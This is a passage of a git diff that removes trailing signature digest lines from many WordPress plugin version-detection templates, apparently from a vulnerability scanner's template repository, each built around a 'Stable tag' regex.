490a0046304402206601a1e5c592aa924b908c05624bdd4018edcf50fa50237c61739f2f5a539e60022024b19a1bb60d6e925914f814c9fca3e25cbe932c2d2dc4f312c9f58701e93ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ad9960e981..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d36a6bd6ff7f14ff1736f14ea4128ff99217860a4cc9b6c3d913b1d6776ce990220281b779c94502d76ac9e5aa9640777ef66f94f0fa363d25df28945b4d749fc87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 54d6679273..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009515102459464ac71694cb0d19548b1bbc95a882b77a72d1555e582c0f554c65022100e949135eb0a75a5301dd501b2dd4d1ae45ad2263aa8f5296aadfa159a4920f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index b312f8bdb8..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203dff5da038abd31310c43128f7730f668b8e9345a992f93bb65b64acbaf1dd14022100aa8283502b648bf39930c32294c3b903b14e518589daeddd4bcfb8a400dd444a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index df4a11445b..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1860ee467a872a2f658bbb4a433a153ee4de4fe360c3aadc160094a70cc527a022049565e9a5ea817b5cb167f7cabfc24aaf465e773cc03e91eca40968a04f10ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index e6c62ef8c3..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c427b9c3939c515096be72afaaf9a1bb6aa451fa641529419f47018a98dfb3b0220088c486de409f09c0bb72dd191d70876a1007e621deea1879d8c5cea5dd47da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 7d9a563426..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055167a4952b446bd4ba9899ab99f5fe97ac5e51aaaf3e55e3f75cb56d553d060022100db5ce6ae51fb91312c6883e22c7ec30afead4e78ca3ab5b21df068feab63fe2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 13dd810775..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220496de10405a0db113532f3d38bd887bff5db44564c1494a40110c524efbb99bb02210090fe841815a9e4b0c0870456b1becdab228a33aa4be1ceb2cfa110025dec9d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index dbddf2eac3..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aac671d7d62179e9b1e70fbd093d3ad49db413c58b2f4d34152369a13de11147022100ec441de9a725d2bd33b3f2a874ccd4ea2af518900d4eb2be8d9d4c0f71f1f329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index d6c25e4ff8..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220745ed563fe521d4eeedc545e875d845e6467b9a85c49e5be51ebd2a9e7e29b4b022100e95e3af8eb6e19b2d3d5d027db3f566afa6ff99aeb49f8d7ff48992c2f835fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index dad4fa9b3d..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e67d212a822bccc9740598b651aa881cc49b611c8b7d740949b483473012d0b902205f6c5638d46e97269998abdf9de486b9da95cc721d97a5103c3640602d537c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9ea0853a4a..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ade837a2f3b88b7de41ea5ce0eea7256f4b35c5588b315178141cddbf57fa69c022100b1b5aa593eaefce2f91278c98317767034cb7dfce8dfd7c25bba416fb90456c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 9265308b5f..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acbe2cbe25bdf13749038ecfddc98b17a98f998bbb66b4edd284ab0eba1b0e57022100f5b3fd64f2aff2a56ac73dd695bf90ae72fd8a0931e7bc29863d12f49b689036:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index c0c0d48d0a..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd907d410b26cefd45717af54f6c625d1aa683faa8f5d8fac0bfb7301ad548ac022100e5a888a9abd6da453b9bfab71d387bd79328058af66870e82c95af464cef60c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index ce4f71b575..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220719a61348fbd579ca92362c3278ef78127b757ce638ec7e7554827062b5886a2022054ea2cbd60079fc4c9ddeb3589e36ca9e86f65016e4e4d62724aeb637e56addc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index bc7f8f866b..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205bdb1ad25246cd2d044bc8846d3d69adee10c837d4c2e33aebbeff6aa8e19191022013b5670de96df3a49c449ef1333aa291d8c7f82cd3fa5e9f62a7be629ccfa654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index c98c43bd07..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009464b5fd1a3fe04276a021904c9207ea8668cdc0733a697ef7548da3e2304d45022018d81e8ee6c97f41b659bd7409503bc6d48f8cb843414d6b4e027a1831899180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index bb3504968e..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002488cc3ac71b9f2c799b70d753639c179019cc0f53e930a6d4f88e67c13ea060220184aeef96ebe67eadaea85b10f0c816aa9642a7f6eca00f4c09062684722f4a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 2d354af44a..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc9a8ccb0d390be237a71b7d535ad33410cf771c904eac17ae38f748b2bb3723022100d55cc55bfcf476c76a7672ab83a8f91557cd8d6b2ffed10f7b534f840b67136f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c111b5626c..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002d9397ca5f145dea67291cd0a4c8e632236b0a71f1f90aca39bce24ecc0df02022100ca0babaa6678a6fb6b2b93ea1de7d0f8293f73f3045af8f8d30146c5cfc34c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 259c7c83f3..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202141aee50dc51b94ad7f5d9092cc612d7e99bac551f94a1f784ac4484d4fe22b02210091c019fbb4ea6d54e849dd80f482d8cd6fe0b66a517e007d2e994c56733c5636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 0b1d7a0ff8..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad2ed0e32781170c09e2a82c68c66cfcc4c79f2289b858134626f9f70b415984022100fd29034c7caf754b51a99b86bdd0e2edaf5a4986f5d13aa0a6c4c3fcc296c681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 88a4985d05..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200444305a1fe2baa1ac4fab4e3ef981c8a9b9ca50726848936a263d96d9327f4e022100b692b29db5d3648de27e5c59d706c66c7b80003a189c550918f4f97174d22a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 638e5ad051..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100979d0980228397c311d2c8c0a27e5de52abf31d686a41cb624322b073acde4be02205354bff9b29b68a33a166f331768335c5f93acbe1a9530310db6e8544d31bafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index e5303a1b91..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a7508d26e81e16eab9d223173c508c02cbf4441b88184d77adbee2cacd691dd022100e23ba0e7ec2b10f1fe1648574f3102457a159cbee5d005916a4c7bbe4be4311f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 11e31ab1f9..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028ccd247749587c6719ecb82eb4aec75756de5b51a46b6a60ee8ffa327cc4f32022100dbcd7df03cb14c9c5d7fd1288a92dce30b8578a46139dffa0af2a4b09e68df90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 0022b36dda..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100831b9f0cff57e70556be5f6cf46f4aeb3df87726325cd644896993d547b4045c022013ef9edbabd6a3081ca37d49621ab07122a8e170b5e73f372d4a03aed5d682a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 0bf0756f5d..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024d36f2264fb64fc58fe6994514ab39910f869829c55297a1a82fbb646a619f9022100dc12e8566b9cbd837e4900e1b330186de1f423dc6de42a66a5766b2d333292d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index f08c3fe26e..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c108228b8e47cdfe2aa7a62fffa645f108c6c09b0c573fb91bfbc4cc2b28cff02210099b4351ca5869edc92ddd500735b94173a661f6f8473971a440c2ba90fac3ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 224f06d205..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fc3512356304edf9a67992875e8933f1c6b00a9beddde0d243d99a2855aaf8f022100ad34e5fce48d580522066481fa24cff452eb5bfa4a58ffc3c088470cf877095e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 93cd10409e..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022063e76a79f8fc143620f416bd5c26bde72c783656dd12b19127e6be38af97645c022013245ae5c6d3bdb00950c41f02cfc2bed54415f97360e000c2cc152b4e4dcf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index ab7c3297a4..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a565e9d7998ffc61ca15e7c0f345e315c3e233b9abe5520fb015f25c4048ab65022067f440c607093467e4887fa8d0c7f4dc2bff001ac1fb0008b9555cc055825982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 8fed2e348b..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf851e0af85ece003ab936f743b96c406c7261b45e47bb34161a7685aad15959022043a1dd9ef7d826f677e199684a1bb13e47b30c742a2b0f0f38d7e02af8e9c6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 08ff0cc99d..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae97c38511927fb949570ed48097e498e2ebce040d9e5a45f647d9d377aee3520221008b4d153a784b060b3dd50a97db9029d819ea31e0f983547660414bca78764508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 4cec828370..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a73c5f1a59cb74b59cceccd00c9511c31d0bf4a0305b43accfff93ece7b48e50220503a95ae5e71d51ff004f6c0132f4d55cc72ac4b37623192aba83317db427984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index ffbbf90500..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f887e66a34da4f27623ccab64340e7869f0e85011eb661b2dbebfc4fe78c9280221008d4f66daf646d34f692ce0924ce01e20e996f8f54ec2b4404ab18179ba5096b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 58f28d68f3..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071378baaf7b76770efaacb9e8b9e9ac249a6047cab5e5ad32802a261464ec2ea022100d9462675b64cc8e00670e4ec1ce8e4b9928186039787210b2be772756a81540e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index ac51c811c1..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205dd9e9b629534fddee75b2fd8c2f3f2378b75ca79051f0d7a46e8add7d0aaeef022100f4bb4c3828b1efc8ada82fd5e1b7c1bf199fd6ff221ac8659c9a6c60be8be932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 0b9524f885..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a92b80433a58ae33714b6fe4ad5402ec94586fd380449a1807ad65359e17672902204bc0dd14e07a4f1b9b4ece866c14815177b309c0be195098d2f9230634469b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 7a043bba9a..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ff0b597bec59e35ce59e65eb37078332dd823db3ce0243a53d71346b33e84a902210085051fe18b81ec25e7114102972a0f507b0da5342b8b64539b382c938b6f2a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 842644173e..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202107ef3aaffb984f291bc63b48e25a7530fce99e6ca02fd8c7f41682fc9857e4022071d0a342c141cbb31fae79cf9ea750f2ca17635aa651d289f49ba683409b8a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index d6532322b9..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050bc3b1539d409a928abe9cccb89bcaefa9ed6eb5fa0a7018f3bac08d029687802205c84afbbafe79e762827651435f2ce4f57591776cfc13dc461ab45e37bbd1286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 62cf70c307..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfef161577003bd5cc2dda046e0268625cd34e1314826013695326f81a3abfaf022100f9b8de80729166666ff4e98a7619b605a01903bd91b9321d8d003fddd3213f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 52af1ed2b6..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082ca07b12da6b1199b0741c3ee214b03ba4c813e8b58f829cbb53fc0a31bab7902210081b77427f9e4d998323afac300220e6b6350c05952e70095db865e2c79d67503:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index ae856c83d2..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6586d080d871d5c08bdad51a337989d6237099496009c5d9f8a123f9259682602207e0c113db6c08eb7fb2fad1d70ae5d87b49dcc86fb802642d8a30fe31360edfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index ce713e5b9b..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c90dab91e5d8bf19b8ac242364264fadc7618fe83b1cf41acbcd0bb48b2094e8022050990530983836a59c43934c3fe6e0e6507baaa4f879e3199e1bc12975ea3b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 35e8e5a404..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e7f71a05271b6a903d67785eb4c1d5631f7a8412daf6f9fbc96d1671f11118b022100f75653bf6bbb8074384d64d30cb72ed5c3506463ee2ca90684d609f3452cf820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml 